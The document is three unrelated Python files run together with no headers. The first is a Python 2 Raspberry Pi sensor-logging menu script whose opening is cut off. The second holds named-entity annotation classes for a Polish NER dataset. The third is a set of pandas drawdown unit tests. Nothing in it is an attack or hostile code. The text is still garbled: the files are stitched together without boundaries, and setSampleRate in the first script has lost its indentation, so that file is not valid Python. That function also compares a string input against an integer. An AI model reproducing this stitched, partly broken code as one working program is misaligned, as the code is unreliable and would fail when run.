# Every current channel starts out enabled.
currentStatus = dict((jumper, "Enabled") for jumper in currentLabels)
# Human-readable name for each thermocouple channel.
thermoLabels = dict(('T%d' % n, "Thermocouple %d" % n) for n in range(8))
# 1-Wire bus address of each thermocouple channel.
thermoAddress = {
    'T0': "3b-0cdc03883a4a",
    'T1': "3b-2cdc03883a8c",
    'T2': "3b-0cdc03883a65",
    'T3': "3b-0cdc03883a6f",
    'T4': "3b-0cdc03883a53",
    'T5': "3b-2cdc03883a9f",
    'T6': "3b-2cdc03883a78",
    'T7': "3b-2cdc03883a82",
}
# Every thermocouple channel starts out enabled.
thermoStatus = dict((channel, "Enabled") for channel in thermoLabels)
#-----------------------------------------------------------------
# Path fragments that bracket a 1-Wire address to reach its data file.
#-----------------------------------------------------------------
tcStart = '/sys/bus/w1/devices/'
tcEnd = '/w1_slave'
#-----------------------------------------------------------------
# Welcome prompt
#-----------------------------------------------------------------
divider = '---------------------------------------------------\n'
print(divider)
print('Welcome to the Raspberry Pi Data Acquistion System!')
print(divider)
#-----------------------------------------------------------------
# Main-menu definition: option letter -> description shown to the user.
#-----------------------------------------------------------------
menu = {
    'F': "- Set the filename for recording.",
    'R': "- Set the sample rate for recording.",
    'T': "- Set the thermocouple labels.",
    'E': "- Enable/Disable thermocouple channels.",
    'U': "- Set temperature unit.",
    'C': "- Set the current sensor labels.",
    'N': "- Enable/Disable current channels.",
    'M': "- Set ADAS modes and durations.",
    'D': "- Display Settings.",
    'S': "- Start the DAQ.",
    'A': "- Autodetect Sensors.",
    'Q': "- Quit.",
}
#-----------------------------------------------------------------
# Function to handle Ctrl+C exit
#-----------------------------------------------------------------
def signal_handler(signum, frame):
    # SIGINT handler registered below via signal.signal(); announces
    # completion and exits with status 0.  The first parameter was renamed
    # from 'signal' so it no longer shadows the signal module (callers pass
    # both arguments positionally, so the rename is safe).
    print('Data Acquistion is complete')
    sys.exit(0)
#-----------------------------------------------------------------
# Function to change the current sensor label
#-----------------------------------------------------------------
def currentInput(tempChoice):
    # Prompt (blocking) for a replacement current-sensor label and return it.
    # tempChoice is the *current* label, shown in the prompt for context.
    # NOTE(review): validFlag is never set True; the loop exits via return.
    validFlag = False
    #Loop until valid response
    while validFlag == False:
        #Input prompt
        print "Selected " + tempChoice + " to change. Please enter a new label : "
        newLabel = raw_input()
        #Check for blank
        if newLabel == '':
            print "Cannot be blank!\n"
        else:
            #Once valid, return the input
            print "Label changed to " + newLabel
            return newLabel
#-----------------------------------------------------------------
# Function to select which current label to change
#-----------------------------------------------------------------
def setCurrentLabels():
    # Interactive menu: repeatedly list the current-sense channels and let
    # the user rename one until Q is entered.  Mutates the module-level
    # currentLabels dictionary in place.
    currentLoop = False
    # Loop until Q
    while currentLoop == False:
        # Get all the current label keys
        # NOTE(review): keys() followed by .sort() relies on Python 2
        # returning a list; a keys view has no sort() under Python 3.
        currentKeys = currentLabels.keys()
        # Sort the keys alphabetically
        currentKeys.sort()
        # Loop through dictionary and display
        for entry in currentKeys:
            print entry, " - ", currentLabels[entry]
        #Get the label selection
        currentChoice = raw_input("Select label to change (Q to quit): ")
        # Verify selection and prompt the new label and set the label
        if currentChoice == 'J3':
            currentLabels['J3'] = currentInput(currentLabels[currentChoice])
        elif currentChoice == 'J6':
            currentLabels['J6'] = currentInput(currentLabels[currentChoice])
        elif currentChoice == 'J8':
            currentLabels['J8'] = currentInput(currentLabels[currentChoice])
        elif currentChoice == 'J10':
            currentLabels['J10'] = currentInput(currentLabels[currentChoice])
        elif currentChoice.upper() == 'Q':
            currentLoop = True
        else:
            print "Not a valid choice!\n"
#-----------------------------------------------------------------
# Function to toggle the status of the sensor from enable/disabled
#-----------------------------------------------------------------
def toggleSensor(tempName, tempValue):
    # Return the opposite enable state, announcing the change.
    # tempName  - human-readable sensor label (used only in the message)
    # tempValue - current state string, "Enabled" or "Disabled"
    #If the state is enabled, toggle it to disabled
    if tempValue == "Enabled":
        print "Sensor " + tempName + " has been disabled.\n"
        return "Disabled"
    #if the state is disabled, toggle it to enabled
    else:
        print "Sensor " + tempName + " has been enabled.\n"
        return "Enabled"
#-----------------------------------------------------------------
# Function to toggle current sensors between enabled and disabled
#-----------------------------------------------------------------
def currentEnDis():
    # Interactive menu: list the current-sense channels with their state and
    # flip the chosen one via toggleSensor() until Q is entered.  Mutates
    # the module-level currentStatus dictionary in place.
    currentLoop = False
    #Loop until Q
    while currentLoop == False:
        #Get the current label keys
        currentKeys = currentLabels.keys()
        #Sort the keys and print the keys
        currentKeys.sort()
        for entry in currentKeys:
            print entry + "\t-\t" + currentLabels[entry] + "\t-\t" + currentStatus[entry]
        #Get the users key choice
        # NOTE(review): the prompt says "thermocouple" but this menu toggles
        # the current-sense channels -- copy/paste text, not changed here.
        currentChoice = raw_input("Select thermocouple to toggle (Q to quit): ")
        #Based on selection, toggle the status of the current sensor
        if currentChoice == 'J3':
            currentStatus['J3'] = toggleSensor(currentLabels[currentChoice], currentStatus[currentChoice])
        elif currentChoice == 'J6':
            currentStatus['J6'] = toggleSensor(currentLabels[currentChoice], currentStatus[currentChoice])
        elif currentChoice == 'J8':
            currentStatus['J8'] = toggleSensor(currentLabels[currentChoice], currentStatus[currentChoice])
        elif currentChoice == 'J10':
            currentStatus['J10'] = toggleSensor(currentLabels[currentChoice], currentStatus[currentChoice])
        elif currentChoice.upper() == 'Q':
            currentLoop = True
        else:
            print "Not a valid choice!\n"
#-----------------------------------------------------------------
# Function to toggle the thermocouple sensors between enabled and disabled
#-----------------------------------------------------------------
def thermoEnDis():
    # Interactive menu: list the thermocouple channels with their state and
    # flip the chosen one via toggleSensor() until Q is entered.  Mutates
    # the module-level thermoStatus dictionary in place.
    thermoLoop = False
    #Loop until Q
    while thermoLoop == False:
        #Get thermocouple keys
        thermoKeys = thermoLabels.keys()
        #Sort the keys
        thermoKeys.sort()
        #Print the dictionary information
        for entry in thermoKeys:
            print entry + "\t-\t" + thermoLabels[entry] + "\t-\t" + thermoStatus[entry]
        thermoChoice = raw_input("Select thermocouple to toggle (Q to quit): ")
        #Based on the selection, toggle the Thermocouple
        if thermoChoice == 'T0':
            thermoStatus['T0'] = toggleSensor(thermoLabels[thermoChoice], thermoStatus[thermoChoice])
        elif thermoChoice == 'T1':
            thermoStatus['T1'] = toggleSensor(thermoLabels[thermoChoice], thermoStatus[thermoChoice])
        elif thermoChoice == 'T2':
            thermoStatus['T2'] = toggleSensor(thermoLabels[thermoChoice], thermoStatus[thermoChoice])
        elif thermoChoice == 'T3':
            thermoStatus['T3'] = toggleSensor(thermoLabels[thermoChoice], thermoStatus[thermoChoice])
        elif thermoChoice == 'T4':
            thermoStatus['T4'] = toggleSensor(thermoLabels[thermoChoice], thermoStatus[thermoChoice])
        elif thermoChoice == 'T5':
            thermoStatus['T5'] = toggleSensor(thermoLabels[thermoChoice], thermoStatus[thermoChoice])
        elif thermoChoice == 'T6':
            thermoStatus['T6'] = toggleSensor(thermoLabels[thermoChoice], thermoStatus[thermoChoice])
        elif thermoChoice == 'T7':
            thermoStatus['T7'] = toggleSensor(thermoLabels[thermoChoice], thermoStatus[thermoChoice])
        elif thermoChoice.upper() == 'Q':
            thermoLoop = True
        else:
            print "Not a valid choice!\n"
#-----------------------------------------------------------------
# Function to change the thermocouple label
#-----------------------------------------------------------------
def thermoInput(tempChoice):
    # Prompt (blocking) for a replacement thermocouple label and return it.
    # tempChoice is the current label, shown in the prompt for context.
    # NOTE(review): validFlag is never set True; the loop exits via return.
    validFlag = False
    #Loop until valid
    while validFlag == False:
        #prompt the user and get the input
        print "Selected " + tempChoice + " to change. Please enter new label : "
        newLabel = raw_input()
        #Check for blank input
        if newLabel == '':
            print "Cannot be blank!\n"
        #Label valid, return the new label
        else:
            print "Label changed to " + newLabel
            return newLabel
#-----------------------------------------------------------------
# function to select the thermocouple labels
#-----------------------------------------------------------------
def setThermocoupleLables():
    # Interactive menu: repeatedly list the thermocouple channels and let
    # the user rename one until Q is entered.  Mutates the module-level
    # thermoLabels dictionary in place.
    # NOTE(review): "Lables" is a typo in the name, kept because the menu
    # dispatcher calls the function under this exact name.
    thermoLoop = False
    #Loop until Q is chosen
    while thermoLoop == False:
        #Get the thermocouple keys
        thermoKeys = thermoLabels.keys()
        # Sort the thermocouple keys
        thermoKeys.sort()
        #Print the thermocouple dictionary
        for entry in thermoKeys:
            print entry, " - ", thermoLabels[entry]
        #Select the thermocouple label to change
        thermoChoice = raw_input("Select label to change (Q to quit): ")
        if thermoChoice == 'T0':
            thermoLabels['T0'] = thermoInput(thermoLabels[thermoChoice])
        elif thermoChoice == 'T1':
            thermoLabels['T1'] = thermoInput(thermoLabels[thermoChoice])
        elif thermoChoice == 'T2':
            thermoLabels['T2'] = thermoInput(thermoLabels[thermoChoice])
        elif thermoChoice == 'T3':
            thermoLabels['T3'] = thermoInput(thermoLabels[thermoChoice])
        elif thermoChoice == 'T4':
            thermoLabels['T4'] = thermoInput(thermoLabels[thermoChoice])
        elif thermoChoice == 'T5':
            thermoLabels['T5'] = thermoInput(thermoLabels[thermoChoice])
        elif thermoChoice == 'T6':
            thermoLabels['T6'] = thermoInput(thermoLabels[thermoChoice])
        elif thermoChoice == 'T7':
            thermoLabels['T7'] = thermoInput(thermoLabels[thermoChoice])
        elif thermoChoice.upper() == 'Q':
            thermoLoop = True
        else:
            print "Not a valid choice!\n"
#-----------------------------------------------------------------
# Function to set the sample rate
#-----------------------------------------------------------------
def setSampleRate():
#Bring in global variable
global sampleRate
validFlag = False
#Loop until selection is valid
while validFlag == False:
#Prompt the user and get the user input
print "Please enter a sample rate in milliseconds (10 is the minimum): "
tempSample = raw_input()
#Check to make sure it is a number
if tempSample.isdigit() == False:
print "Must be a number.\n"
#Answer cannot be blank
elif tempSample == '':
print "Cannot be a blank input!\n"
#Valid input
else:
#If the input is less than 10 (min), then set it to minimum
if tempSample <= 10:
sampleRate = 10
print "Sample rate set to 10ms\n"
validFlag = True
#If greater then min, set the value
else:
sampleRate = tempSample
print "Sample rate set to " + sampleRate + "ms\n"
validFlag = True
#-----------------------------------------------------------------
# Funtion to set the filename
#-----------------------------------------------------------------
def setFileName():
    # Prompt for an alphanumeric file name (no extension) and store it in
    # the module-level filePath once it does not collide with an existing
    # file under storagePath.
    #Bring in the global variable
    global filePath
    validFlag = False
    #Loop until the data is valid
    while validFlag == False:
        #Prompt the user and get the input
        print "Please enter a filename to store the data (no extension): "
        fileName = raw_input()
        #can't be blank
        if fileName == '':
            print "Cannot be a blank input!\n"
        #Can only be alphanumeric
        elif fileName.isalnum() == False:
            print "Can only be alphanumeric!\n"
        #Data is valid
        else:
            #Check to see if the file already exist
            # NOTE(review): the existence check uses storagePath directly,
            # while displayAllSettings() prefixes os.getcwd() -- confirm
            # which location the data file is actually written to.
            tempPath = storagePath + fileName + fileExt
            if os.path.isfile(tempPath):
                print "File Already Exist. Please use a different name.\n"
            #unique and can be set
            else:
                #Only the bare name is stored; path and extension are
                #re-assembled by the consumers.
                print "Valid file. Path set to: " + tempPath + "\n"
                filePath = fileName
                validFlag = True
#-----------------------------------------------------------------
# Function to change the temperature unit
#-----------------------------------------------------------------
def unitChange():
    # Interactive menu to set the module-level temperatureUnit to Celsius
    # ('C'), Fahrenheit ('F') or both ('B'); Q leaves the unit unchanged.
    #Pull in global variables
    global temperatureUnit
    validFlag = False
    #Loop until Q
    while validFlag == False:
        #print the menu and get user response
        print "Please choose a unit for temperature: "
        print "C:\tCelsius"
        print "F:\tFahrenheit"
        print "B:\tBoth"
        print "Q:\tQuit"
        unitChoice = raw_input("Please select the unit: ")
        #Cannot be blank
        if unitChoice == '':
            print "Cannot be blank input!\n"
        #Not blank, check valid
        else:
            #Set the units
            if unitChoice.upper() == 'C':
                temperatureUnit = "C"
                print "Changed units to Celsius.\n"
            elif unitChoice.upper() == 'F':
                temperatureUnit = "F"
                print "Changed units to Fahrenheit.\n"
            elif unitChoice.upper() == 'B':
                temperatureUnit = "B"
                print "Changed units to Both.\n"
            elif unitChoice.upper() == 'Q':
                validFlag = True
            else:
                print "Not valid\n"
#-----------------------------------------------------------------
# Function to display all the settings that are being used for the test
#-----------------------------------------------------------------
def displayAllSettings():
    # Dump every configurable setting (file path, sample rate, channel
    # tables and temperature unit) to the console.  Read-only.
    # Print the header
    print "-------------------------------------------------\n"
    print "Current Settings\n"
    print "-------------------------------------------------\n"
    #Filename
    print "Filepath: " + os.getcwd() + storagePath + filePath + fileExt + "\n"
    #Sample Rates
    print "Sample Rate: " + str(sampleRate) + "\n"
    #current sensors
    print "Current Sensors:"
    #Label, Net, Enable/Disable
    # NOTE(review): unlike the other menus the current keys are not sorted
    # here, so they print in arbitrary dictionary order.
    currentKeys = currentLabels.keys()
    for entry in currentKeys:
        print entry + "\t-\t" + currentLabels[entry] + "\t-\t" + currentStatus[entry]
    #thermocouple sensors
    print "\nThermocouple Sensors:"
    #channel, Label, Address, Enable/Disable
    thermoKeys = thermoLabels.keys()
    thermoKeys.sort()
    for entry in thermoKeys:
        print entry + "\t-\t" + thermoLabels[entry] + "\t-\t" + thermoAddress[entry] + "\t-\t" + thermoStatus[entry]
    #units
    print "\nTemperature Unit: " + temperatureUnit
#-----------------------------------------------------------------
# Function to return list of all the enabled current sensors
#-----------------------------------------------------------------
def getCurrentEnabled():
    # Return the current-sense channel keys whose status is "Enabled",
    # sorted alphabetically.  sorted() replaces the old keys()/sort()
    # pair, which only works where keys() returns a list (Python 2);
    # the result and its ordering are unchanged.
    return [entry for entry in sorted(currentLabels)
            if currentStatus[entry] == "Enabled"]
#-----------------------------------------------------------------
# Function to return list of all the thermocouple sensors
#-----------------------------------------------------------------
def getThermoEnabled():
    # Return the thermocouple channel keys whose status is "Enabled",
    # sorted alphabetically.  sorted() replaces the old keys()/sort()
    # pair, which only works where keys() returns a list (Python 2);
    # the result and its ordering are unchanged.
    return [entry for entry in sorted(thermoLabels)
            if thermoStatus[entry] == "Enabled"]
#-----------------------------------------------------------------
# Function to return the temperature reading
#-----------------------------------------------------------------
def temp_raw(tempSensor):
    # Read every line from a 1-Wire sensor data file and return them as a
    # list of raw text lines.
    # tempSensor - full path to the device's w1_slave file.
    # 'with' closes the file even if readlines() raises; the old explicit
    # open()/close() pair leaked the handle on error.
    with open(tempSensor, 'r') as sensorFile:
        return sensorFile.readlines()
def convertToF(tempC):
    # Convert a Celsius reading to Fahrenheit (F = C * 9/5 + 32).
    scaled = tempC * 9.0
    return scaled / 5.0 + 32.0
def getTemperatureValue(tempKey):
    # Read one thermocouple channel and return its temperature in Celsius.
    # tempKey - channel key ('T0'..'T7') used to look up the 1-Wire address.
    lines = temp_raw(tcStart + thermoAddress[tempKey] + tcEnd)
    # Re-read until the driver reports a valid CRC ('YES' at the end of the
    # first line).  NOTE(review): the back-off sleep is commented out, so a
    # flaky sensor spins this loop at full speed.
    while lines[0].strip()[-3:] != 'YES':
        #time.sleep(0.2)
        lines = temp_raw(tcStart + thermoAddress[tempKey] + tcEnd)
    temp_output = lines[1].find('t=')
    if temp_output != -1:
        # The driver reports millidegrees after 't='; convert to degrees C.
        temp_string = lines[1].strip()[temp_output+2:]
        temp_c = float(temp_string) / 1000.0
        return temp_c
    # Falls through (returning None) when no 't=' field is present.
def getADCValues():
    # Sample all four ADC channels with the module-level GAIN and return
    # the raw readings as a 4-element list (index = channel number).
    values = [0]*4
    for i in range(4):
        # Read the specified ADC channel using the previously set gain value.
        values[i] = adc.read_adc(i, gain=GAIN)
    return values
#-----------------------------------------------------------------
# Function to get data and convert it to a usable format
#-----------------------------------------------------------------
def runDAQ():
    # Sampling loop: build and print a column-header row for every enabled
    # channel, then continuously sample and print one formatted row per
    # pass until the user interrupts with Ctrl+C.
    global startTime
    colprint = '|{:10}|'
    # NOTE(review): formatprint is assigned but never used.
    formatprint = 'Time (ms)'
    colHeaders = ['Time (ms)']
    #Get all the current sensors that are valid
    for items in getCurrentEnabled():
        colprint += ' {:>5} |'
        colHeaders.append(items)
    #Get all the thermocouple sensors that are valid
    for items in getThermoEnabled():
        colprint += ' {:>5} |'
        colHeaders.append(items)
    print colprint.format(*colHeaders)
    try:
        while True:
            rowVals = []
            currentTime = time.time()
            # Get current sensor, Get thermocouple
            rowVals.append("{:7.2f}".format(currentTime - startTime))
            # NOTE(review): all four ADC channels are read regardless of the
            # enabled list (the filtered loop is commented out), so the row
            # can contain more values than headers when some are disabled.
            #for items in getCurrentEnabled():
            rowVals.extend(getADCValues())
            for items in getThermoEnabled():
                temp_c = getTemperatureValue(items)
                rowVals.append(temp_c)
            print colprint.format(*rowVals)
            # NOTE(review): sampleRate is not honoured here -- the sleep is
            # commented out, so sampling runs as fast as the sensors allow.
            #time.sleep(0.1)
    except KeyboardInterrupt:
        return
#-----------------------------------------------------------------
# Function to start the DAQ
#-----------------------------------------------------------------
def startDAQ():
    # Show the configured settings, ask for confirmation, then reset the
    # t=0 reference and enter the sampling loop (runDAQ) until Ctrl+C.
    global startTime
    # Print the header
    print "------------------------------------------------\n"
    print "Data Acquistion\n"
    print "------------------------------------------------\n"
    #Display the settings
    print "Settings: "
    displayAllSettings()
    validFlag = False
    #While choice isn't valid
    while validFlag == False:
        # Make sure the user wants to run the test
        print "\n Data acquistion will run until Ctrl+C is pressed. Press R to continue or Q to abort"
        menuInput = raw_input()
        # Check the input
        if menuInput.upper() == "R":
            print "Starting...."
            validFlag = True
        elif menuInput.upper() == "Q":
            print "Aborting..."
            validFlag = True
        else:
            print "Invalid input\n"
    # if R, run the test, or abort
    if menuInput.upper() == "R":
        #Reset the timestamp origin just before sampling begins
        startTime = time.time()
        runDAQ()
    else:
        return
#-----------------------------------------------------------------
# Function to auto detect what sensors are valid
#-----------------------------------------------------------------
def autoDetectSensors():
    # Probe each thermocouple: readings of 1000C or more are treated as
    # out-of-range (disconnected) and the channel is disabled; channels
    # reading sanely again are re-enabled.
    # try to get values for thermocouples, if above range, set as disabled
    thermoKeys = thermoLabels.keys()
    thermoKeys.sort()
    for sensors in thermoKeys:
        temp_c = getTemperatureValue(sensors)
        if temp_c >= 1000 and thermoStatus[sensors] == "Enabled":
            thermoStatus[sensors] = toggleSensor(thermoLabels[sensors], thermoStatus[sensors])
        elif temp_c < 1000 and thermoStatus[sensors] == "Disabled":
            thermoStatus[sensors] = toggleSensor(thermoLabels[sensors], thermoStatus[sensors])
    # try to get current sensor value, if out of range, disabled
    # NOTE(review): the ADC readings are only printed; no range check is
    # applied to the current channels yet.
    print getADCValues()
    return
#-----------------------------------------------------------------
# Function to analyze the menu choice
#-----------------------------------------------------------------
def menuAnalysis(userChoice):
    # Dispatch a single main-menu selection (case-insensitive) to its
    # handler; 'Q' exits the process, unknown options print an error.
    if userChoice.upper() == 'F':
        setFileName()
    elif userChoice.upper() == 'R':
        setSampleRate()
    elif userChoice.upper() == 'T':
        setThermocoupleLables()
    elif userChoice.upper() == 'C':
        setCurrentLabels()
    elif userChoice.upper() == 'D':
        displayAllSettings()
    elif userChoice.upper() == 'S':
        startDAQ()
    elif userChoice.upper() == 'Q':
        print "Thanks!"
        sys.exit(0)
    elif userChoice.upper() == 'E':
        thermoEnDis()
    elif userChoice.upper() == 'M':
        # NOTE(review): the 'M' (ADAS modes) menu entry is a stub.
        print "Set modes"
    elif userChoice.upper() == 'N':
        currentEnDis()
    elif userChoice.upper() == 'U':
        unitChange()
    elif userChoice.upper() == 'A':
        autoDetectSensors()
    else:
        print "Not valid"
#handle ctrl+c press
signal.signal(signal.SIGINT, signal_handler)
#-----------------------------------------------------------------
# Function for the main menu
#-----------------------------------------------------------------
# Main loop: display the options, read a selection and dispatch it until
# the user quits (menuAnalysis exits the process directly on 'Q').
# NOTE(review): the options print in arbitrary dictionary order because
# menu.keys() is not sorted.
while (menuChoice.upper() != 'Q'):
    options = menu.keys()
    for entry in options:
        print entry, menu[entry]
    menuChoice = raw_input("Please Select: ")
    menuAnalysis(menuChoice)
    print "\n"
|
|
# encoding: utf-8
import re
from itertools import izip
from crf.data.dataset import DataSet, divide_data, divide_in_two
# Grammatical cases that can appear in the morphological tag strings.
CASES = ["nom", "gen", "dat", "acc", "inst", "loc", "voc"]
# Matches one case token delimited by ':' or the string boundaries; the
# case itself is captured in group(2).
CASE_REGEX = re.compile("(^|:)(%s)($|:)" % '|'.join(CASES))
class Segment(object):
    """A single morphologically analysed token.

    Holds the token id, surface form (orth), lemma (base), part of speech
    (pos) and the raw morphological tag (morph); the grammatical case is
    extracted from the morph tag once, at construction time.
    """

    def __init__(self, id, orth="?", base="?", pos="?", morph="?", nps=False):
        self._id = id
        # nps = "no preceding space" flag, used when rebuilding surface text.
        self._nps = nps
        self._orth = orth
        self._base = base
        self._pos = pos
        self._morph = morph
        self._case = self._get_case(morph)

    @property
    def id(self):
        return self._id

    @property
    def nps(self):
        return self._nps

    @property
    def orth(self):
        return self._orth

    @property
    def base(self):
        return self._base

    @property
    def pos(self):
        return self._pos

    def _get_case(self, morph):
        """Extract the grammatical case from the morph tag, or None.

        Sanity-checks the annotation: case-bearing parts of speech must
        carry a case and all other parts of speech must not.
        """
        match = CASE_REGEX.search(morph)
        # Idiom fix: compare against None with 'is' / 'is not' (PEP 8)
        # rather than '!=' / '=='; behaviour is unchanged.
        assert match is not None if self._pos in ["subst", "depr", "ger",
            "ppron12", "ppron3", "num", "numcol", "adj", "pact",
            "ppas", "prep", "siebie"] else match is None
        if match is not None:
            return match.group(2)
        return None

    @property
    def case(self):
        return self._case

    @property
    def morph(self):
        return self._morph

    def __eq__(self, other):
        return (self.id, self.orth, self.base, self.pos, self.morph) \
            == (other.id, other.orth, other.base, other.pos, other.morph)

    def __hash__(self):
        # Consistent with __eq__: equal segments necessarily share an id.
        return hash(self.id)

    def __repr__(self):
        return ('Segment(id=%s, orth=%s, interp=%s)' \
            % (self.id,
               self.orth,
               ':'.join([self.base, self.pos, self.morph]))) \
            .encode('utf-8', 'ignore')
class DummySegment(Segment):
    """A stand-in Segment that carries only an identifier."""

    def __init__(self, id):
        # All descriptive fields use the same '?' placeholder as the defaults.
        super(DummySegment, self).__init__(id, "?", "?", "?", "?")

    def __repr__(self):
        return "DummySegment(id={0})".format(self.id)
class NamedEntity(object):
    """A (possibly nested) named-entity annotation.

    ptrs holds the entity's constituents in surface order: Segment leaves
    and/or embedded child NamedEntity objects.
    """

    def __init__(self,
                 id,
                 type,
                 subtype,
                 ptrs,
                 base=None,
                 derivType=None,
                 derivedFrom=None):
        self._id = id
        self._type = type
        self._subtype = subtype
        self._ptrs = ptrs
        self._base = base
        self._derivType = derivType
        self._derivedFrom = derivedFrom

    @property
    def id(self):
        return self._id

    @id.setter
    def id(self, id):
        self._id = id

    @property
    def type(self):
        return self._type

    @property
    def subtype(self):
        return self._subtype

    @property
    def ptrs(self):
        return self._ptrs

    @property
    def derivType(self):
        return self._derivType

    @property
    def derivedFrom(self):
        return self._derivedFrom

    @property
    def base(self):
        return self._base

    def get_segs(self):
        """Return all Segment leaves, recursing into nested entities."""
        res = []
        for ptr in self.ptrs:
            if isinstance(ptr, Segment):
                res.append(ptr)
            else:
                res.extend(ptr.get_segs())
        return res

    def get_child_segs(self):
        """Return only the direct Segment children (no recursion)."""
        return [ptr for ptr in self.ptrs if isinstance(ptr, Segment)]

    def get_child_names(self):
        """Return only the direct NamedEntity children (no recursion)."""
        return [ptr for ptr in self.ptrs if isinstance(ptr, NamedEntity)]

    def get_descendant_names_and_self(self):
        return [self] + self.get_descendant_names()

    def get_descendant_names(self):
        """Return all nested NamedEntity descendants, depth first."""
        res = []
        for name in self.get_child_names():
            res.extend(name.get_descendant_names_and_self())
        return res

    def get_label(self):
        """Build the classification label: type[.subtype][@derivType]."""
        # Consistency fix: use 'is not None' (as __repr__ already does)
        # instead of '!= None'; behaviour is unchanged.
        if self.subtype is not None:
            out = self.type + "." + self.subtype
        else:
            out = self.type
        if self.derivType is not None:
            out = out + "@" + self.derivType
        return out

    def _get_orth(self):
        # Rebuild the surface text; each segment is preceded by a space
        # unless its nps ("no preceding space") flag is set.
        out = []
        for ptr in self.ptrs:
            if isinstance(ptr, NamedEntity):
                out.append(ptr._get_orth())
            else:
                if not ptr.nps:
                    out.append(' ')
                out.append(ptr.orth)
        return ''.join(out)

    @property
    def orth(self):
        return self._get_orth().strip()

    def __eq__(self, other):
        # Identity semantics: distinct entity objects are never equal.
        return self is other

    def __hash__(self):
        return hash(self.id)

    def _ptrs_str(self):
        # Fixed: the old loop appended ', ' after *every* id whenever there
        # was more than one pointer, producing "[a, b, ]"; join() places the
        # separator only between ids.
        return '[' + ', '.join(ptr.id for ptr in self.ptrs) + ']'

    def __repr__(self):
        out = ['NamedEntity(']
        out.append('id=%s, type=%s, ' % (self.id, self.type))
        if self.subtype is not None:
            out.append('subtype=%s, ' % self.subtype)
        if self.base is not None:
            out.append('base=%s, ' % self.base)
        if self.derivType is not None:
            out.append('derivType=%s, ' % self.derivType)
        if self.derivedFrom is not None:
            out.append('derivedFrom=%s, ' % self.derivedFrom)
        out.append('ptrs=%s)' % self._ptrs_str())
        return ''.join(out)

    def __str__(self):
        val = ""
        for seg in sorted(self.get_segs(), key=lambda seg: seg.id):
            val += str(seg) + "\n"
        return val.strip()
def flatten(l):
    """Concatenate a sequence of iterables into one flat list."""
    return [element for sublist in l for element in sublist]
def join_names(names1, names2, discard_nested=True):
    """Try to put NEs from names2 list to names1 list; return joined lists.

    A name from names2 is appended only when none of its segments is
    already covered by names1.  NOTE: names1 is extended in place and the
    same list object is returned.
    """
    # Kept as '!=' deliberately: only the exact value True (or 1) selects
    # the implemented behaviour; other truthy values still raise.
    if discard_nested != True:
        raise NotImplementedError
    # Segments already covered by names1, computed once up front.
    # NOTE(review): coverage is not extended as names2 entries are accepted,
    # so two names2 entries that overlap only each other are both added --
    # existing behaviour, preserved as-is.
    coverage = set(flatten(ne.get_segs() for ne in names1))
    result = names1
    for ne in names2:
        # isdisjoint avoids materialising an intersection set per entry.
        if coverage.isdisjoint(ne.get_segs()):
            result.append(ne)
    return result
class NerDataSet(DataSet):
    """CRF DataSet extended with NEs for each sentence."""
    def __init__(self, rdata, *args, **kwargs):
        # rdata is a sequence of (raw_sent, sent) pairs; the raw sentences
        # are kept on the side while the base DataSet receives only the
        # processed sentences.
        self.raw_data = [raw_sent for raw_sent, _ in rdata]
        DataSet.__init__(self, [sent for _, sent in rdata], *args, **kwargs)
    def iterator(self):
        # Lazily re-pair each raw sentence with its processed counterpart.
        return ((raw_sent, sent)
                for raw_sent, sent
                in izip(self.raw_data, self.data))
    def divide(self, n, stat=(lambda x: 1)):
        """Divide dataset data to n parts."""
        return divide_data(self.iterator(), self.dirs, n, stat=stat)
    def divide_in_two(self, r):
        # Split the paired data into two parts with ratio r.
        return divide_in_two(self.iterator(), self.dirs, r)
def filter_raw(data):
    """Keep only the processed sentence from each (raw_sent, sent) pair."""
    return [sent for _, sent in data]
|
|
from __future__ import division
from unittest import TestCase
from nose_parameterized import parameterized
import numpy as np
import pandas as pd
import pandas.util.testing as pdt
from .. import timeseries
from .. import utils
DECIMAL_PLACES = 8
class TestDrawdown(TestCase):
    """Tests for the drawdown helpers in the timeseries module."""

    # Price path that falls, bottoms out and recovers past its peak.
    px_list_1 = np.array(
        [100, 120, 100, 80, 70, 110, 180, 150]) / 100.  # Simple
    # Price path that never regains its peak.
    px_list_2 = np.array(
        [100, 120, 100, 80, 70, 80, 90, 90]) / 100.  # Ends in drawdown
    dt = pd.date_range('2000-1-3', periods=8, freq='D')

    # Cases: (prices, expected peak, valley, recovery); recovery is None
    # when the series ends while still in drawdown.
    @parameterized.expand([
        (pd.Series(px_list_1,
                   index=dt),
         pd.Timestamp('2000-1-4'),
         pd.Timestamp('2000-1-7'),
         pd.Timestamp('2000-1-9')),
        (pd.Series(px_list_2,
                   index=dt),
         pd.Timestamp('2000-1-4'),
         pd.Timestamp('2000-1-7'),
         None)
    ])
    def test_get_max_drawdown(
            self, px, expected_peak, expected_valley, expected_recovery):
        rets = px.pct_change().iloc[1:]
        peak, valley, recovery = timeseries.get_max_drawdown(rets)
        # Need to use isnull because the result can be NaN, NaT, etc.
        self.assertTrue(
            pd.isnull(peak)) if expected_peak is None else self.assertEqual(
            peak,
            expected_peak)
        self.assertTrue(
            pd.isnull(valley)) if expected_valley is None else \
            self.assertEqual(
                valley,
                expected_valley)
        self.assertTrue(
            pd.isnull(recovery)) if expected_recovery is None else \
            self.assertEqual(
                recovery,
                expected_recovery)

    # Same cases plus the expected drawdown duration in days (None when
    # the drawdown never recovers).
    @parameterized.expand([
        (pd.Series(px_list_2,
                   index=dt),
         pd.Timestamp('2000-1-4'),
         pd.Timestamp('2000-1-7'),
         None,
         None),
        (pd.Series(px_list_1,
                   index=dt),
         pd.Timestamp('2000-1-4'),
         pd.Timestamp('2000-1-7'),
         pd.Timestamp('2000-1-9'),
         4)
    ])
    def test_gen_drawdown_table(self, px, expected_peak,
                                expected_valley, expected_recovery,
                                expected_duration):
        rets = px.pct_change().iloc[1:]
        drawdowns = timeseries.gen_drawdown_table(rets, top=1)
        self.assertTrue(
            pd.isnull(
                drawdowns.loc[
                    0,
                    'peak date'])) if expected_peak is None \
            else self.assertEqual(drawdowns.loc[0, 'peak date'],
                                  expected_peak)
        self.assertTrue(
            pd.isnull(
                drawdowns.loc[0, 'valley date'])) \
            if expected_valley is None else self.assertEqual(
                drawdowns.loc[0, 'valley date'],
                expected_valley)
        self.assertTrue(
            pd.isnull(
                drawdowns.loc[0, 'recovery date'])) \
            if expected_recovery is None else self.assertEqual(
                drawdowns.loc[0, 'recovery date'],
                expected_recovery)
        self.assertTrue(
            pd.isnull(drawdowns.loc[0, 'duration'])) \
            if expected_duration is None else self.assertEqual(
                drawdowns.loc[0, 'duration'], expected_duration)

